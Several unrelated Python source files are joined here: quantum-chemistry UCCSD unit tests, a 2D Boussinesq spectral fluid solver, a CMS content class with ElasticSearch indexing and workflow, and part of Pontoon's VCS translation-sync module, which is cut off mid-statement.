1.1494145e-08 * FermionOperator("0^ 2") +
(-0.0565340614) * FermionOperator("1^ 3 0^ 2") +
(-1.1494145e-08) * FermionOperator("3^ 1") +
(-0.0565340614) * FermionOperator("1^ 3 1^ 3") +
(-0.0565340614) * FermionOperator("0^ 2 0^ 2") +
(-1.1494145e-08) * FermionOperator("2^ 0") +
0.0565340614 * FermionOperator("3^ 1 3^ 1") +
(-0.0565340614) * FermionOperator("0^ 2 1^ 3"))
self.assertTrue(test_generator.isclose(generator))
def test_simulation_energy(self):
"""Test UCCSD Singlet Energy for H2"""
# Define H2 Hamiltonian inline
hamiltonian = ((-0.0453222020986) * QubitOperator("X0 X1 Y2 Y3") +
(0.165867023964) * QubitOperator("Z0 Z3") +
(0.174348441706) * QubitOperator("Z2 Z3") +
(0.120544821866) * QubitOperator("Z0 Z2") +
(3.46944695195e-18) * QubitOperator("X0 Y1 X2 Y3") +
(0.165867023964) * QubitOperator("Z1 Z2") +
(0.171197748533) * QubitOperator("Z0") +
(-0.222785928901) * QubitOperator("Z3") +
(3.46944695195e-18) * QubitOperator("X0 X1 X2 X3") +
(0.168622191433) * QubitOperator("Z0 Z1") +
(0.120544821866) * QubitOperator("Z1 Z3") +
(3.46944695195e-18) * QubitOperator("Y0 Y1 Y2 Y3") +
(-0.0988639735178) * QubitOperator("") +
(0.171197748533) * QubitOperator("Z1") +
(0.0453222020986) * QubitOperator("Y0 X1 X2 Y3") +
(3.46944695195e-18) * QubitOperator("Y0 X1 Y2 X3") +
(-0.0453222020986) * QubitOperator("Y0 Y1 X2 X3") +
(-0.222785928901) * QubitOperator("Z2") +
(0.0453222020986) * QubitOperator("X0 Y1 Y2 X3"))
hamiltonian.compress()
compiler_engine = uccsd_trotter_engine()
wavefunction = compiler_engine.allocate_qureg(4)
test_amplitudes = [-1.14941450e-08, 5.65340614e-02]
for i in range(2):
X | wavefunction[i]
evolution_operator = uccsd_singlet_evolution(test_amplitudes, 4, 2)
evolution_operator | wavefunction
compiler_engine.flush()
energy = compiler_engine.backend.get_expectation_value(hamiltonian,
wavefunction)
All(Measure) | wavefunction
self.assertAlmostEqual(energy, -1.13727017463)
def test_simulation_with_graph(self):
"""Test UCCSD Singlet Energy for H2 using a restricted qubit_graph"""
# Define H2 Hamiltonian inline
hamiltonian = ((-0.0453222020986) * QubitOperator("X0 X1 Y2 Y3") +
(0.165867023964) * QubitOperator("Z0 Z3") +
(0.174348441706) * QubitOperator("Z2 Z3") +
(0.120544821866) * QubitOperator("Z0 Z2") +
(3.46944695195e-18) * QubitOperator("X0 Y1 X2 Y3") +
(0.165867023964) * QubitOperator("Z1 Z2") +
(0.171197748533) * QubitOperator("Z0") +
(-0.222785928901) * QubitOperator("Z3") +
(3.46944695195e-18) * QubitOperator("X0 X1 X2 X3") +
(0.168622191433) * QubitOperator("Z0 Z1") +
(0.120544821866) * QubitOperator("Z1 Z3") +
(3.46944695195e-18) * QubitOperator("Y0 Y1 Y2 Y3") +
(-0.0988639735178) * QubitOperator("") +
(0.171197748533) * QubitOperator("Z1") +
(0.0453222020986) * QubitOperator("Y0 X1 X2 Y3") +
(3.46944695195e-18) * QubitOperator("Y0 X1 Y2 X3") +
(-0.0453222020986) * QubitOperator("Y0 Y1 X2 X3") +
(-0.222785928901) * QubitOperator("Z2") +
(0.0453222020986) * QubitOperator("X0 Y1 Y2 X3"))
hamiltonian.compress()
# Create a star graph of 4 qubits, all connected through qubit 0
qubit_graph = Graph()
compiler_engine = uccsd_trotter_engine(qubit_graph=qubit_graph)
wavefunction = compiler_engine.allocate_qureg(4)
for i in range(4):
qubit_graph.add_node(Node(value=wavefunction[i].id))
for i in range(1, 4):
qubit_graph.add_edge(0, i)
test_amplitudes = [-1.14941450e-08, 5.65340614e-02]
for i in range(2):
X | wavefunction[i]
evolution_operator = uccsd_singlet_evolution(test_amplitudes, 4, 2)
evolution_operator | wavefunction
compiler_engine.flush()
energy = compiler_engine.backend.get_expectation_value(hamiltonian,
wavefunction)
All(Measure) | wavefunction
self.assertAlmostEqual(energy, -1.13727017463)
def test_sparse_uccsd_operator_numpy_inputs(self):
"""Test numpy ndarray inputs to uccsd_operator that are sparse"""
test_orbitals = 30
sparse_single_amplitudes = numpy.zeros((test_orbitals, test_orbitals))
sparse_double_amplitudes = numpy.zeros((test_orbitals, test_orbitals,
test_orbitals, test_orbitals))
sparse_single_amplitudes[3, 5] = 0.12345
sparse_single_amplitudes[12, 4] = 0.44313
sparse_double_amplitudes[0, 12, 6, 2] = 0.3434
sparse_double_amplitudes[1, 4, 6, 13] = -0.23423
generator = uccsd_operator(sparse_single_amplitudes,
sparse_double_amplitudes)
test_generator = (0.12345 * FermionOperator("3^ 5") +
(-0.12345) * FermionOperator("5^ 3") +
0.44313 * FermionOperator("12^ 4") +
(-0.44313) * FermionOperator("4^ 12") +
0.3434 * FermionOperator("0^ 12 6^ 2") +
(-0.3434) * FermionOperator("2^ 6 12^ 0") +
(-0.23423) * FermionOperator("1^ 4 6^ 13") +
0.23423 * FermionOperator("13^ 6 4^ 1"))
self.assertTrue(test_generator.isclose(generator))
def test_sparse_uccsd_operator_list_inputs(self):
"""Test list inputs to uccsd_operator that are sparse"""
sparse_single_amplitudes = [[[3, 5], 0.12345],
[[12, 4], 0.44313]]
sparse_double_amplitudes = [[[0, 12, 6, 2], 0.3434],
[[1, 4, 6, 13], -0.23423]]
generator = uccsd_operator(sparse_single_amplitudes,
sparse_double_amplitudes)
test_generator = (0.12345 * FermionOperator("3^ 5") +
(-0.12345) * FermionOperator("5^ 3") +
0.44313 * FermionOperator("12^ 4") +
(-0.44313) * FermionOperator("4^ 12") +
0.3434 * FermionOperator("0^ 12 6^ 2") +
(-0.3434) * FermionOperator("2^ 6 12^ 0") +
(-0.23423) * FermionOperator("1^ 4 6^ 13") +
0.23423 * FermionOperator("13^ 6 4^ 1"))
self.assertTrue(test_generator.isclose(generator))
| |
from __future__ import division
import numpy as np
from numpy import pi, exp, sqrt, cos, sin
import os
import h5py
try:
import pyfftw
pyfftw.interfaces.cache.enable()
except ImportError:
pass
class Boussinesq2d(object):
""" 2D Boussinesq code in vorticity-streamfunction/buoyancy formulation """
def __init__(
# grid parameters
self,
nx = 128,
nz=None,
Lx=2*pi,
Lz=None,
# physical parameters
nu = 0.,
Fr = .1,
R = 0.99,
sig = 1.,
ext_forc=False,
kf = 4.,
# timestepping parameters
dt=.0025, # numerical timestep
twrite=100, # interval for cfl and ke printout (in timesteps)
tmax=100., # total time of integration
filt=True, # spectral filter flag
use_fftw=True,
ntd = 1, # number of threads for fftw
# filter or dealiasing (False for 2/3 rule)
use_filter=True,
# saving parameters
tsave=100, # interval to save (in timesteps)
save_snapshots=True,
overwrite=True,
tsave_snapshots=100,
path = 'output/'):
if nz is None: nz = nx
if Lz is None: Lz = Lx
# initialize parameters
# domain
self.nx = nx
self.nz = nz
self.Lx = Lx
self.Lz = Lz
self.dx = Lx/nx
self.dz = Lz/nz
self.x = np.arange(0.,Lx,self.dx)
self.z = np.arange(0.,Lz,self.dz)
self.x,self.z = np.meshgrid(self.x,self.z)
# physical
self.nu = nu
self.Fr = Fr
self.Fr2 = Fr**2
self.sig = 1.e6
self.R = R
self.sig = sig
self.kf = kf
# ext forcing
self.ext_forc = ext_forc
# time related variables
self.nmax = int(np.ceil(tmax/dt))
self.dt = dt
self.twrite = twrite
self.tmax = tmax
self.t = 0.
self.ndt = 0
self.tsave = tsave
self.tsave_snapshots=tsave_snapshots
self.nsave_max = int(np.ceil(self.nmax/tsave))
self.save_snapshots = save_snapshots
self.nsave = 0
self.overwrite=True
self.snapshots_path = path
# fourier settings
self._init_kxky()
self.kappa2 = self.k**2 + self.l**2
self.kappa = sqrt(self.kappa2)
self.fnz = self.kappa2 != 0
self.kappa2i = np.zeros_like(self.kappa2) # inversion not defined at kappa=0
self.kappa2i[self.fnz] = self.kappa2[self.fnz]**-1
# exponential filter or dealising
self.use_filter = use_filter
self._init_filter()
# fftw
self.use_fftw = use_fftw
self.ntd = ntd
# allocate variables
self._allocate_variables()
# DFT
self._initialize_fft()
# initialize time-stepper
self._init_rk3w()
# initialize fno
if self.save_snapshots:
self._init_save_snapshots(self.snapshots_path)
# setup file
self._save_setup()
def run(self):
""" step forward until tmax """
while(self.t < self.tmax):
if not(self.ext_forc):
self._random_forcing()
self._stepforward()
if (self.ndt%self.twrite == 0.):
self._printout()
if self.save_snapshots:
self._save_snapshots()
self.t += self.dt
self.ndt += 1
self._save_diagnostics()
def _stepforward(self):
""" march the system forward using a RK3W-theta scheme """
self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
self.qh = (self.L1*self.qh + self.c1*self.dt*self.nl1h).copy()
self.qh = self.filt*self.qh
self.bh = (self.L1*self.bh + self.c1*self.dt*self.nl1h_b).copy()
self.bh = self.filt*self.bh
self.nl2h = self.nl1h.copy()
self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
self.nl2h_b = self.nl1h_b.copy()
self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
self.qh = (self.L2*self.qh + self.c2*self.dt*self.nl1h +\
self.d1*self.dt*self.nl2h).copy()
self.qh = self.filt*self.qh
self.bh = (self.L2*self.bh + self.c2*self.dt*self.nl1h_b +\
self.d1*self.dt*self.nl2h_b).copy()
self.bh = self.filt*self.bh
self.nl2h = self.nl1h.copy()
self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
self.nl2h_b = self.nl1h_b.copy()
self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
self.qh = (self.L3*self.qh + self.c3*self.dt*self.nl1h +\
self.d2*self.dt*self.nl2h).copy()
self.qh = self.filt*self.qh
self.bh = (self.L3*self.bh + self.c3*self.dt*self.nl1h_b +\
self.d2*self.dt*self.nl2h_b).copy()
self.bh = self.filt*self.bh
def _allocate_variables(self):
""" Allocate variables in memory """
dtype_real = np.dtype('float64')
dtype_cplx = np.dtype('complex128')
shape_real = (self.nz, self.nx)
shape_cplx = (self.nz, self.nx/2+1)
# vorticity
self.q = np.zeros(shape_real, dtype_real)
self.qh = np.zeros(shape_cplx, dtype_cplx)
# streamfunction
self.p = np.zeros(shape_real, dtype_real)
self.ph = np.zeros(shape_cplx, dtype_cplx)
# buoyancy
self.b = np.zeros(shape_real, dtype_real)
self.bh = np.zeros(shape_cplx, dtype_cplx)
# velocity
self.u = np.zeros(shape_real, dtype_real)
self.v = np.zeros(shape_real, dtype_real)
# nonlinear-terms
self.nl1h = np.zeros(shape_cplx, dtype_cplx)
self.nl2h = np.zeros(shape_cplx, dtype_cplx)
self.nl1h_b = np.zeros(shape_cplx, dtype_cplx)
self.nl2h_b = np.zeros(shape_cplx, dtype_cplx)
# amplitude of forcing
self.A = np.zeros(shape_cplx, dtype_real)
def _initialize_fft(self):
# set up fft functions for use later
if self.use_fftw:
self.fft2 = (lambda x :
pyfftw.interfaces.numpy_fft.rfft2(x, threads=self.ntd,\
planner_effort='FFTW_ESTIMATE'))
self.ifft2 = (lambda x :
pyfftw.interfaces.numpy_fft.irfft2(x, threads=self.ntd,\
planner_effort='FFTW_ESTIMATE'))
else:
self.fft2 = (lambda x : np.fft.rfft2(x))
self.ifft2 = (lambda x : np.fft.irfft2(x))
def _init_kxky(self):
""" Calculate wavenumbers """
self.dl = 2.*pi/self.Lz
self.dk = 2.*pi/self.Lx
self.ll = self.dl*np.append( np.arange(0.,self.nz/2),
np.arange(-self.nz/2,0.) )
self.kk = self.dk*np.arange(0.,self.nx/2+1)
self.k,self.l = np.meshgrid(self.kk,self.ll)
self.kj = 1j*self.k
self.lj = 1j*self.l
def _invert(self):
""" Compute streamfunction from vorticity """
self.ph = -self.kappa2i*self.qh
def set_q(self,q):
""" Initialize vorticity """
self.q = q
self.qh = self.fft2(self.q)
self._invert()
self.ph = self.filt * self.ph
def set_b(self,b):
""" Initialize buoyancy """
self.b = b
self.bh = self.fft2(self.b)
self.bh = self.filt * self.bh
def set_forcing(self,f):
""" Initialize forcing """
if self.ext_forc:
self.f = f
self.fh = self.fft2(self.f)
self.fh = self.filt * self.fh
else:
self.fhp = 0.
self.A = self.sig*np.exp(-((self.kappa-self.kf)/2)**4)
self.A[:,0] = 0.
self.A[0,:] = 0.
self._random_forcing()
def _random_forcing(self):
""" Random forcing """
th = 2*pi*np.random.rand(self.nx,self.nz/2+1)
self.fh = self.A*(1.-self.R)*np.exp(1j*th) + self.R*self.fhp
self.fhp = self.fh.copy()
def jacobian(self):
""" Compute the Jacobian in conservative form """
self._invert()
self.ph = self.filt*self.ph
self.q = self.ifft2(self.qh)
self.u = self.ifft2(-self.lj*self.ph)
self.v = self.ifft2( self.kj*self.ph)
jach = self.kj*self.fft2(self.u*self.q) +\
self.lj*self.fft2(self.v*self.q)
return jach
def jacobian_b(self):
""" Compute the Jacobian between psi and b in conservative form """
self.b = self.ifft2(self.bh)
jach = self.kj*self.fft2(self.u*self.b) +\
self.lj*self.fft2(self.v*self.b)
return jach
def _printout(self):
""" Print model status """
if (self.ndt%self.twrite == 0.):
self.ke = self._calc_ke()
self.pe = self._calc_pe()
self.ens = self._calc_ens()
self.ani = self._calc_anisotropy()
self.cfl = self._calc_cfl()
print "t= %e, cfl= %e, ke= %e, pe= %e, ens= %e, ani=%e" %(self.t, self.cfl,
self.ke, self.pe, self.ens, self.ani)
assert self.cfl<1., "CFL condition violated"
def _init_save_snapshots(self,path):
self.fno = path
if not os.path.isdir(self.fno):
os.makedirs(self.fno)
os.makedirs(self.fno+"/snapshots/")
def _file_exist(self, fno):
if os.path.exists(fno):
if self.overwrite:
os.remove(fno)
else: raise IOError("File exists: {0}".format(fno))
def _save_setup(self,):
"""Save setup """
fno = self.fno + 'setup.h5'
self._file_exist(fno)
h5file = h5py.File(fno, 'w')
h5file.create_dataset("grid/nx", data=(self.nx),dtype=int)
h5file.create_dataset("grid/nz", data=(self.nz),dtype=int)
h5file.create_dataset("grid/x", data=(self.x))
h5file.create_dataset("grid/z", data=(self.z))
h5file.create_dataset("grid/kappa", data=self.kappa)
h5file.close()
def _save_snapshots(self, fields=['q','b','u','v']):
""" Save snapshots of fields """
fno = self.fno + '/snapshots/{:015.0f}'.format(self.t)+'.h5'
self._file_exist(fno)
h5file = h5py.File(fno, 'w')
for field in fields:
h5file.create_dataset(field, data=eval("self."+field))
h5file.close()
def _save_diagnostics(self, diagnostics=['t','ke','pe','ens']):
""" Save diagnostics """
fno = self.fno + 'diagnostics.h5'
self._file_exist(fno)
h5file = h5py.File(fno, 'w')
for diagnostic in diagnostics:
h5file.create_dataset(diagnostic, data=eval("self."+diagnostic))
h5file.close()
# step forward
def _init_rk3w(self):
"""Initialize time-stepper stuff"""
self.a1, self.a2, self.a3 = 29./96., -3./40., 1./6.
self.b1, self.b2, self.b3 = 37./160., 5./24., 1./6.
self.c1, self.c2, self.c3 = 8./15., 5./12., 3./4.
self.d1, self.d2 = -17./60., -5./12.
self.Lin = -self.nu*self.kappa2*self.dt
self.L1 = ( (1. + self.a1*self.Lin)/(1. - self.b1*self.Lin) )
self.L2 = ( (1. + self.a2*self.Lin)/(1. - self.b2*self.Lin) )
self.L3 = ( (1. + self.a2*self.Lin)/(1. - self.b3*self.Lin) )
def _init_filter(self):
""" Set spectral filter """
if self.use_filter:
cphi=0.65*pi
cphi = 0.715*pi;
wvx=sqrt((self.k*self.dx)**2.+(self.l*self.dz)**2.)
self.filt = exp(-23.6*(wvx-cphi)**4.)
self.filt[wvx<=cphi] = 1.
else:
# if not use exponential filter,
# then dealias using 2/3 rule
self.filt = np.ones_like(self.kappa2)
self.filt[self.nx/3:2*self.nx/3,:] = 0.
self.filt[:,self.nz/3:] = 0.
# some diagnostics
def _calc_cfl(self):
return np.abs(
np.hstack([self.u, self.v])).max()*self.dt/self.dx
def _calc_ke(self):
ke = .5*self.spec_var(self.kappa*self.ph)
return ke.sum()
def _calc_pe(self):
pe = .5*self.spec_var(self.bh/self.Fr)
return pe.sum()
def _calc_ens(self):
ens = .5*self.spec_var(self.kappa2*self.ph)
return ens.sum()
def _calc_anisotropy(self):
return (self.u**2).mean()/(self.v**2).mean()
def spec_var(self,ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / (self.nx*self.nz)**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[:,0],var_dens[:,-1] = var_dens[:,0]/2.,var_dens[:,-1]/2.
return var_dens.sum()
| |
from object import Object
import colander, deform
from cms import dbutil
from bson.objectid import ObjectId
from cms.htmlutil import html_to_text
import widgets
import permissions
import repoze.workflow
import zope.interface
from pyramid import security
from interfaces import IContent, ITrash
import pyes
import logging
log = logging.getLogger(__name__)
class Content(Object):
""" Base type for CMS content objects.
Content is location-aware (uses the __parent__ attribute).
Content is indexed in ElasticSearch.
Content is workflowed with the "publication" workflow.
"""
zope.interface.implements(IContent)
_object_type = "content"
def get_class_schema(cls, request=None):
""" Return basic schema (title and description) for all Content.
"""
schema = colander.SchemaNode(colander.Mapping())
schema.add(colander.SchemaNode(colander.String(), name='title', include_in_other_text=False, widget=widgets.get_wide_text_widget()))
schema.add(colander.SchemaNode(colander.String(), name='description', include_in_other_text=False, widget=widgets.get_wide_textarea_widget(rows=5)))
return schema
get_class_schema = classmethod(get_class_schema)
def _get_nonschema_mongo_save_document(self):
doc = Object._get_nonschema_mongo_save_document(self)
doc['_object_type'] = self._object_type
doc['__parent__'] = self.__parent__ and self.__parent__._id
_pub_state = self.get_pub_state()
if _pub_state: doc['_pub_state'] = _pub_state
doc['_view'] = self._get_view_principals()
doc['sortable_title'] = self.sortable_title.lower()
doc['_in_trash'] = self.in_trash()
return doc
def _load_nonschema_attributes(self, **kwargs):
Object._load_nonschema_attributes(self, **kwargs)
_pub_state = kwargs.get('_pub_state')
if _pub_state: self._pub_state = _pub_state
def _get_view_principals(self):
return list(security.principals_allowed_by_permission(self, permissions.VIEW))
def _get_es_doctype(cls):
#return "content"
return cls._object_type
_get_es_doctype = classmethod(_get_es_doctype)
#
# If you have the need to index additional attributes of a specific type,
# override both _get_es_mapping() and _get_es_document()
# to call the base methods, get the returned dictionary, and add extra fields
# to it before returning it.
#
# Note that for most types, this won't be necessary since colander.String schema
# nodes will be added to the "other_text" index automatically (unless you explicitly
# disable that behavior by setting include_in_other_text=False on the schema node).
#
# If you have string fields that you want to use as categories, tags, or some other
# sort of value that you can filter on, be sure to:
# 1. set include_in_other_text=False on the schema node
# 2. set index="not_analyzed" in the mapping to disable tokenizing and allow the field
# to be used for sorting
#
def _get_es_mapping(cls):
mapping = {}
mapping['__name__'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['_view'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['_pub_state'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['_id_path'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['_object_type'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['title'] = dict(type='string', include_in_all=True, boost=4.0)
mapping['sortable_title'] = dict(type='string', include_in_all=False, index='not_analyzed')
mapping['description'] = dict(type='string', include_in_all=True, boost=2.0)
mapping['other_text'] = dict(type='string', include_in_all=True)
mapping['_created'] = dict(type='date', format='dateOptionalTime', include_in_all=False)
mapping['_modified'] = dict(type='date', format='dateOptionalTime', include_in_all=False)
return mapping
_get_es_mapping = classmethod(_get_es_mapping)
def _get_es_document(self):
doc = dict(__name__ = self.__name__,
_object_type = self._object_type,
title = self.title,
sortable_title = self.sortable_title.lower(),
description = self.description,
_created = self._created,
_modified = self._modified,
_id_path = [str(x) for x in self.get_id_path()],
)
doc['_view'] = self._get_view_principals()
_pub_state = self.get_pub_state()
if _pub_state: doc['_pub_state'] = _pub_state
doc['other_text'] = self.get_es_other_text()
return doc
def index(self):
dbutil.get_es_conn(self.request).index(self._get_es_document(), dbutil.get_es_index_name(self.request), self._get_es_doctype(), str(self._id))
def unindex(self):
try:
dbutil.get_es_conn(self.request).delete(dbutil.get_es_index_name(self.request), self._get_es_doctype(), str(self._id))
except pyes.exceptions.NotFoundException, e:
pass
def get_es_other_text(self):
return '\n'.join(self._get_text_values_for_schema_node(self.get_schema(), self.get_schema_values()))
def _get_text_values_for_schema_node(self, node, value):
result = []
if not value: return result
if type(node.typ) == colander.Mapping:
for cnode in node.children:
name = cnode.name
val = value.get(name, None)
if val:
result += self._get_text_values_for_schema_node(cnode, val)
elif type(node.typ) == colander.Sequence:
if node.children:
cnode = node.children[0]
for val in value:
result += self._get_text_values_for_schema_node(cnode, val)
elif type(node.typ) == colander.String:
if getattr(node, 'include_in_other_text', True):
if type(node.widget) == deform.widget.RichTextWidget:
value = html_to_text(value, 0)
if value: result.append(value)
elif type(node.typ) == deform.FileData:
pass # FIXME: handle PDF, Word, etc
return result
def save(self, set_modified=True, index=True):
# Set pull_parent_from_old_files=False since we want to keep old
# files around for the edit history log.
Object.save(self, set_modified=set_modified, pull_parent_from_old_files=False)
if index: self.index()
def get_id_path(self):
ids = []
obj = self
while obj:
parent = obj.__parent__
if parent: ids.insert(0, parent._id)
obj = parent
ids.append(self._id)
return ids
def _pre_delete(self):
self.unindex()
Object._pre_delete(self)
def get_sortable_title(self):
# move articles to the end of the string
# Example: "The Sound and the Fury" -> "Sound and the Fury, The"
result = getattr(self, 'title', '')
lower_title = result.lower()
for article in ('the', 'a', 'an'):
if lower_title.startswith(article + ' '):
result = '%s, %s' % (result[len(article)+1:], result[:len(article)])
return result
def get_pub_state(self):
""" Return this object's state in the publication workflow.
"""
workflow = get_publication_workflow(self)
if workflow is None:
return None
return workflow.state_of(self)
def get_pub_workflow_transitions(self):
workflow = get_publication_workflow(self)
if workflow is None:
return []
return workflow.get_transitions(self, self.request)
def pub_workflow_transition(self, transition):
workflow = get_publication_workflow(self)
workflow.transition(self, self.request, transition)
self.save()
def in_trash(self):
return self.find_interface(ITrash) is not None
def _get_acl(self):
# If we're in the trash, we shouldn't have any acl (and inherit the trash acl).
if self.in_trash(): return None
# Return the acl for our pub state (if any).
state = self.get_pub_state()
#log.debug("in _get_acl(); state=%s" % repr(state))
if state:
return permissions.acl_by_state.get(state, None)
return None
def __getattr__(self, name):
if name == '__acl__':
acl = self._get_acl()
if acl is not None:
return acl
elif name == 'sortable_title':
return self.get_sortable_title()
raise AttributeError
def _get_merged_local_roles(self):
""" Recurse up from self to root looking for local roles.
Merge the values together to discover all local roles that apply to self.
(Note that this method will only compute the result once and cache it;
later calls will return the cached result.)
Returns a dictionary where each key is a principal name with one or more
local roles; each value is a set of system-level group principal names.
"""
if hasattr(self, '_merged_local_roles'):
return self._merged_local_roles
lr = {}
if hasattr(self, 'get_local_roles'):
lr = self.get_local_roles()
merged = {}
if self.__parent__:
merged.update(self.__parent__._get_merged_local_roles())
if lr:
for (principal, sysgroup) in lr.items():
local_sysgroups = merged.get(principal, set())
local_sysgroups.add(sysgroup)
merged[principal] = local_sysgroups
else:
merged = lr
self._merged_local_roles = merged
return merged
def get_publication_workflow(context):
return repoze.workflow.get_workflow(context, 'publication', context)
#################################################
# Workflow callbacks
#################################################
def publication_workflow_elector(context):
# We don't want the workflow to apply to all types.
return context._object_type not in ('root', )
def publication_workflow_callback(content, info):
#log.debug("publication_workflow_callback content=%s info=%s" % (repr(content), repr(info)))
#log.debug("info.transition="+repr(info.transition))
# Note that workflow callbacks are called just before the state_attr is set.
# FIXME: send an event that could be subscribed to (for instance, to send emails)
pass
| |
"""
Models for working with remote translation data stored in a VCS.
"""
import logging
import os
import scandir
import shutil
from itertools import chain
from datetime import datetime
from django.utils import timezone
from django.utils.functional import cached_property
from pontoon.base import MOZILLA_REPOS
from pontoon.sync.exceptions import ParseError
from pontoon.sync.utils import (
is_hidden,
is_resource,
is_asymmetric_resource,
get_parent_directory,
uses_undercore_as_separator,
directory_contains_resources,
locale_directory_path,
locale_to_source_path,
source_to_locale_path,
)
from pontoon.sync.vcs.repositories import get_changed_files
log = logging.getLogger(__name__)
class MissingSourceRepository(Exception):
"""
Raised when project can't find the repository
which contains source files.
"""
class MissingSourceDirectoryError(Exception):
"""Raised when sync can't find the source directory for the locales."""
class MissingLocaleDirectoryError(IOError):
"""Raised when sync can't find the locale directory."""
class VCSProject(object):
"""
Container for project data that is stored on the filesystem and
pulled from a remote VCS.
"""
SOURCE_DIR_SCORES = {
'templates': 3,
'en-US': 2,
'en-us': 2,
'en': 1
}
SOURCE_DIR_NAMES = SOURCE_DIR_SCORES.keys()
def __init__(
self, db_project, now=None, locales=None, repo_locales=None, obsolete_entities_paths=None,
new_paths=None, full_scan=False
):
"""
Load resource paths from the given db_project and parse them
for translation data.
:param Project db_project:
Project model instance for the project we're going to be
reading files for.
:param datetime.datetime now:
Sync start time.
:param list locales:
List of Locale model instances for the locales that we want
to parse. Defaults to parsing resources for all enabled
locales on the project.
:param dict repo_locales:
A dict of repository PKs and their currently checked out locales
(not neccessarily matching the ones stored in the DB).
:param list obsolete_entities_paths:
List of paths to remove translations of obsolete entities from
:param list new_paths:
List of newly added files paths
:param bool full_scan:
Scans all resources in repository
"""
self.db_project = db_project
self.now = now
self.locales = locales if locales is not None else db_project.locales.all()
self.repo_locales = repo_locales
self.obsolete_entities_paths = obsolete_entities_paths or []
self.new_paths = new_paths or []
self.full_scan = full_scan
self.synced_locales = set()
@cached_property
def changed_files(self):
if self.full_scan:
# All files are marked as changed
return None
if self.locales:
return self.changed_locales_files
else:
return self.changed_source_files[0]
@cached_property
def changed_source_files(self):
"""
Returns a tuple of changed and removed source files in the project:
(changed_files, removed_files)
"""
source_resources_repo = self.db_project.source_repository
if not source_resources_repo:
raise MissingSourceRepository(self.db_project)
source_directory = self.source_directory_path
last_revision = source_resources_repo.get_last_synced_revisions()
modified_files, removed_files = get_changed_files(
source_resources_repo.type, source_directory, last_revision
)
# Unify filesystem and data model file extensions
modified_files = map(source_to_locale_path, modified_files)
removed_files = map(source_to_locale_path, removed_files)
if source_resources_repo.source_repo or not last_revision:
def get_path(path):
return (path, [])
else:
relative_source_path = (
source_directory[len(source_resources_repo.checkout_path):].lstrip(os.sep)
)
def get_path(path):
return (path[len(relative_source_path):].lstrip(os.sep), [])
return dict(map(get_path, modified_files)), dict(map(get_path, removed_files))
@cached_property
def changed_locales_files(self):
"""
Map of changed files and locales they were changed for.
"""
files = {}
# VCS changes
repos = self.db_project.translation_repositories()
if self.repo_locales:
repos = repos.filter(pk__in=self.repo_locales.keys())
for repo in repos:
if repo.multi_locale:
locales = (
self.repo_locales[repo.pk] if self.repo_locales
else self.db_project.locales.all()
)
for locale in locales:
changed_files = get_changed_files(
repo.type,
repo.locale_checkout_path(locale),
repo.get_last_synced_revisions(locale.code)
)[0]
for path in changed_files:
files.setdefault(path, []).append(locale)
else:
changed_files = get_changed_files(
repo.type,
repo.checkout_path,
repo.get_last_synced_revisions()
)[0]
log.info(
'Changed files in {} repository, all: {}'.format(
self.db_project.name, changed_files
)
)
# Find relevant changes in repository by matching changed
# paths against locale repository paths
locale_path_locales = self.locale_path_locales(repo.checkout_path)
locale_paths = locale_path_locales.keys()
for path in changed_files:
if is_hidden(path):
continue
for locale_path in locale_paths:
if path.startswith(locale_path):
locale = locale_path_locales[locale_path]
path = path[len(locale_path):].lstrip(os.sep)
files.setdefault(path, []).append(locale)
break
log.info(
'Changed files in {} repository, relevant for enabled locales: {}'.format(
self.db_project.name, files
)
)
# DB changes
vcs = files
db = self.db_project.changed_resources(self.now)
for path in set(vcs.keys() + db.keys()):
if path in vcs and path in db:
vcs[path] = set(list(vcs[path]) + list(db[path]))
else:
vcs[path] = vcs[path] if path in vcs else db[path]
return files
def locale_path_locales(self, repo_checkout_path):
"""
A map of relative locale directory paths and their respective locales.
"""
locale_path_locales = {}
for locale in self.db_project.locales.all():
locale_directory = self.locale_directory_paths[locale.code]
path = locale_directory[len(repo_checkout_path):].lstrip(os.sep)
path = os.path.join(path, '') # Ensure the path ends with os.sep
locale_path_locales[path] = locale
return locale_path_locales
@cached_property
def locale_directory_paths(self):
"""
A map of locale codes and their absolute directory paths.
Create locale directory, if not in repository yet.
"""
locale_directory_paths = {}
parent_directories = set()
for locale in self.locales:
try:
locale_directory_paths[locale.code] = locale_directory_path(
self.checkout_path, locale.code, parent_directories
)
parent_directory = get_parent_directory(locale_directory_paths[locale.code])
except IOError:
if not self.db_project.has_multi_locale_repositories:
source_directory = self.source_directory_path
parent_directory = get_parent_directory(source_directory)
locale_code = locale.code
if uses_undercore_as_separator(parent_directory):
locale_code = locale_code.replace('-', '_')
locale_directory = os.path.join(parent_directory, locale_code)
# For asymmetric formats, create empty folder
if is_asymmetric_resource(next(self.relative_resource_paths())):
os.makedirs(locale_directory)
# For other formats, copy resources from source directory
else:
shutil.copytree(source_directory, locale_directory)
for root, dirnames, filenames in scandir.walk(locale_directory):
for filename in filenames:
path = os.path.join(root, filename)
if is_resource(filename):
os.rename(path, source_to_locale_path(path))
else:
os.remove(path)
locale_directory_paths[locale.code] = locale_directory
else:
raise MissingLocaleDirectoryError(
'Directory for locale `{0}` not found'.format(locale.code)
)
parent_directories.add(parent_directory)
return locale_directory_paths
@cached_property
def resources(self):
"""
Lazy-loaded mapping of relative paths -> VCSResources.
Waiting until first access both avoids unnecessary file reads
and allows tests that don't need to touch the resources to run
with less mocking.
"""
resources = {}
log.info(
'Changed files in {} repository and Pontoon: {}'.format(
self.db_project, self.changed_files
)
)
for path in self.relative_resource_paths():
# Syncing translations
if self.locales:
# Copy list instead of cloning
locales = list(self.db_project.unsynced_locales)
if (
self.changed_files is not None and
(
(not self.changed_files or path not in self.changed_files) and
path not in self.obsolete_entities_paths and
path not in self.new_paths
)
):
